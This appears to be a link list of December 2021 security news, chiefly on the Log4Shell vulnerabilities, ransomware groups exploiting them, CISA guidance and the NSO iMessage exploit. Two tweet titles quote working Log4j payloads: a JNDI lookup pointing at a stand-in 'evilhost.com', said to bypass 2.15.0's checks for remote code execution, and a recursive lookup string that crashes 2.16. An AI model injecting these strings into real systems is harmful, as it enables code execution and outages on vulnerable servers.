Log4j – Apache Log4j Security Vulnerabilities
https://logging.apache.org/log4j/2.x/security.html
Red Sense- Intelligence Operations
https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement
[LOG4J2-3230] Certain strings can cause infinite recursion - ASF JIRA
https://issues.apache.org/jira/browse/LOG4J2-3230![[LOG4J2-3230] Certain strings can cause infinite recursion - ASF JIRA](/image/screenshot/907eecbf283f4fd07d0462fe5118b9f1.webp)
Project Zero: A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Pegasus vs. Predator: Dissident's Doubly-Infected iPhone Reveals Cytrox Mercenary Spyware - The Citizen Lab
https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/
The Cyber Startup Observatory - The Global Cyber Innovation Network
https://cyberstartupobservatory.com
Release v3.1.1.0 · lgandx/Responder · GitHub
https://github.com/lgandx/Responder/releases/tag/v3.1.1.0
Ian Beer on Twitter: "Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists, activists and dissidents around the world. https://t.co/RYsqpTHF5j" / Twitter
https://twitter.com/i41nbeer/status/1471163195679252484
Conti ransomware uses Log4j bug to hack VMware vCenter servers
https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/
Tweet / Twitter
https://twitter.com/liamosaur/status/1471626232961716225
GitHub - back2root/log4shell-rex: PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs
https://github.com/back2root/log4shell-rex
TellYouThePass ransomware via Log4Shell exploitation
https://www.curatedintel.org/2021/12/tellyouthepass-ransomware-via-log4shell.html
Emergency Directive 22-02 (Closed) | CISA
http://cisa.gov/emergency-directive-22-02
New DarkHotel APT attack chain identified | Zscaler
https://www.zscaler.com/blogs/security-research/new-darkhotel-apt-attack-chain-identified
Log4Shell Update: Severity Upgraded 3.7 to 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaTrace
https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/
Conti ransomware group adopts Log4Shell exploit
https://therecord.media/conti-ransomware-group-adopts-log4shell-exploit/
[#LOG4J2-3230] Certain strings can cause infinite recursion - ASF JIRA
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-3230![[#LOG4J2-3230] Certain strings can cause infinite recursion - ASF JIRA](/image/screenshot/aadc504a247b785239798cd3caff67fa.webp)
Cybersecurity and Infrastructure Security Agency on Twitter: "🚨 We issued Emergency Directive (ED) 22-02 in response to the Apache Log4j vulnerabilities. The ED requires action for federal civilian agencies to mitigate these vulnerabilities. We encourage all organizations to take similar steps: https://t.co/q9FWn00r4e https://t.co/dyHtd0B9Sl" / Twitter
https://twitter.com/CISAgov/status/1471869749164486656
vx-underground on Twitter: "New exploit on Friday, as is tradition: Researchers have discovered Log4J version 2.16 is vulnerable to DoS via "${${::-${::-$${::-j}}}}" More info: https://t.co/pzeWiQEa68" / Twitter
https://twitter.com/vxunderground/status/1471943986705281029
Apache Log4j Vulnerability Guidance | CISA
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
Vitali Kremez on Twitter: "🔥[Breaking blog] Ransomware Advisory:#Log4Shell Exploitation for Initial Access & Lateral Movement 1⃣Log4Shell |2⃣Discovery: Conti Becomes The First Sophisticated Crimeware Group Weaponizing Log4j2 |3⃣Early Warning: Ransomware Exploitation of Vuln https://t.co/kev5HbIVgS https://t.co/IiTlIXYCp6" / Twitter
https://twitter.com/VK_Intel/status/1471865226417119233![Vitali Kremez on Twitter: "🔥[Breaking blog] Ransomware Advisory:#Log4Shell Exploitation for Initial Access & Lateral Movement 1⃣Log4Shell |2⃣Discovery: Conti Becomes The First Sophisticated Crimeware Group Weaponizing Log4j2 |3⃣Early Warning: Ransomware Exploitation of Vuln https://t.co/kev5HbIVgS https://t.co/IiTlIXYCp6" / Twitter](/image/screenshot/46ca543bae936cbbfd3c3dc76a16c052.webp)
Chinese Spies Accused of Using Huawei in Secret Australian Telecom Hack - Bloomberg
https://www.bloomberg.com/news/articles/2021-12-16/chinese-spies-accused-of-using-huawei-in-secret-australian-telecom-hack
Kyle Alspach on Twitter: "In releasing #log4j threat data for free, @GreyNoiseIO decided “we don’t care about making money on this. We want to just get this out because everything’s on fire,” says @Andrew___Morris https://t.co/EqDJajNCeI #Log4Shell" / Twitter
https://twitter.com/KyleAlspach/status/1471910285153693699
The Web3 Fraud | USENIX
https://www.usenix.org/publications/loginonline/web3-fraud
regex101: build, test, and debug regex
http://regex101.com/r/KqGG3W/3
New Phorpiex Botnet Variant Steals Half a Million Dollars in Cryptocurrency
https://thehackernews.com/2021/12/new-phorpiex-botnet-variant-steals-half.html
New PseudoManuscrypt Malware Infected Over 35,000 Computers in 2021
https://thehackernews.com/2021/12/new-pseudomanuscrypt-malware-infected.html
Google Online Security Blog: Understanding the Impact of Apache Log4j Vulnerability
https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html
Sleep Mask Update in Cobalt Strike 4.5 | Cobalt Strike
https://www.cobaltstrike.com/blog/sleep-mask-update-in-cobalt-strike-4-5/
Dmitri Alperovitch on Twitter: "Wow. Just wow. This NSO zero-click iMessage exploit is the most impressive attack code I’ve ever seen. A whole computer architecture built out of a few logic operators… in an EXPLOIT! The talent of the individuals who came up and developed this technique is beyond impressive" / Twitter
https://twitter.com/DAlperovitch/status/1471359164093972481
Tweet / Twitter
https://twitter.com/jaxson_davidson/status/1470933731548356614
Tweet / Twitter
https://twitter.com/ncweaver/status/1471668214480334851
Márcio Almeida on Twitter: "FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n" / Twitter
https://twitter.com/marcioalm/status/1471740771581652995
Joseph Menn on Twitter: "IBM says under "ethical vulnerability disclosure management" it isn't warning of flaws: "This means that IBM does not confirm or otherwise disclose vulnerabilities externally, even to individual customers, until a fix or remediation is available." Is this normal behavior?" / Twitter
https://twitter.com/josephmenn/status/1471563546915835905
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI | Official Juniper Networks Blogs
https://blogs.juniper.net/en-us/threat-research/log4j-vulnerability-attackers-shift-focus-from-ldap-to-rmi